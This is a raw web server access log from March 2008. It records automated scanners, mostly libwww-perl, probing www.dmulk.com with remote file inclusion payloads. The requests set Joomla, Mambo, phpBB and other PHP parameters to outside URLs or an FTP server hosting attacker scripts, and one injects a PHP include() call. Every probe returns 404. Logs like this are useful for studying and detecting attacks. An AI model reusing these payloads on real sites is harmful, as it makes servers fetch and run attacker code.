84.252.138.71 - - [23/Mar/2008:08:20:00 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:20:01 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:20:01 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:20:13 -0700] "GET /logs/access_080207.log//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:20:25 -0700] "GET /logs/access_080117.log/furum.php?furum=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:36 -0700] "GET /logs/access_080223.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:36 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:36 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:46 -0700] "GET /logs/access_080312.log//saveserver.php?thisdir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:46 -0700] "GET //saveserver.php?thisdir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:20:46 -0700] "GET /logs//saveserver.php?thisdir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:08:20:52 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.126.239.14 - - [23/Mar/2008:08:21:25 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:22:00 -0700] "GET /logs/access_080131.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:22:01 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:22:01 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:22:03 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:22:05 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:22:25 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:22:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:22:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.252.11 - - [23/Mar/2008:08:22:51 -0700] "GET /errors.php?error=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [23/Mar/2008:08:23:07 -0700] "GET /logs/access_080124.log//extras/ext_cats.php?dir_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [23/Mar/2008:08:23:07 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:24:19 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:24:27 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:24:27 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:24:28 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:24:50 -0700] "GET /logs/access.log//components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:25:23 -0700] "GET /logs/access_080131.log/index.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:25:23 -0700] "GET /index.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:25:24 -0700] "GET /logs/index.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:37 -0700] "GET /logs/access_071216.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:38 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:38 -0700] "GET /logs/access_071216.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:38 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:38 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:38 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:39 -0700] "GET /logs/access_071216.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:39 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:25:40 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:25:44 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:25:44 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:25:45 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:08:26:01 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.184.192 - - [23/Mar/2008:08:26:09 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [23/Mar/2008:08:26:10 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [23/Mar/2008:08:26:10 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:26:21 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:26:21 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:26:21 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:27:40 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:08:28:18 -0700] "GET //index.php?option=com_custompages&cpage=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.170 - - [23/Mar/2008:08:28:28 -0700] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:28:34 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:28:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:28:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.254.214.3 - - [23/Mar/2008:08:28:55 -0700] "GET //components/com_users/layout.php?mosConfig_absolute_path=http://bandas.com.ar/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:10 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:10 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.44.247 - - [23/Mar/2008:08:29:10 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:29:20 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:29:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:29:21 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.213.252 - - [23/Mar/2008:08:30:03 -0700] "GET /modifyform.html?code=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.225.213.252 - - [23/Mar/2008:08:30:03 -0700] "GET /logs/modifyform.html?code=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:30:06 -0700] "GET /logs/access_080220.log//admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:30:06 -0700] "GET //admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:30:06 -0700] "GET /logs//admin.php?include_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:30:20 -0700] "GET /logs/access_080312.log//saveserver.php?thisdir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:30:20 -0700] "GET //saveserver.php?thisdir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:30:21 -0700] "GET /logs//saveserver.php?thisdir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [23/Mar/2008:08:30:21 -0700] "GET /logs/access_071218.log//extras/ext_cats.php?dir_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:08:30:52 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:29 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:44 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:44 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:31:51 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:31:51 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:31:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:57 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:31:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:32:03 -0700] "GET /logs/access_080223.log/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:32:04 -0700] "GET /index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:32:04 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.225.221.84 - - [23/Mar/2008:08:32:04 -0700] "GET /logs/index.php?body=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:06 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:06 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.48.206 - - [23/Mar/2008:08:32:12 -0700] "GET //popup_window.php?site_isp_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
62.141.48.206 - - [23/Mar/2008:08:32:12 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:18 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:18 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:18 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:32 -0700] "GET /logs/access_080215.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:32 -0700] "GET //components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:32:32 -0700] "GET /logs//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
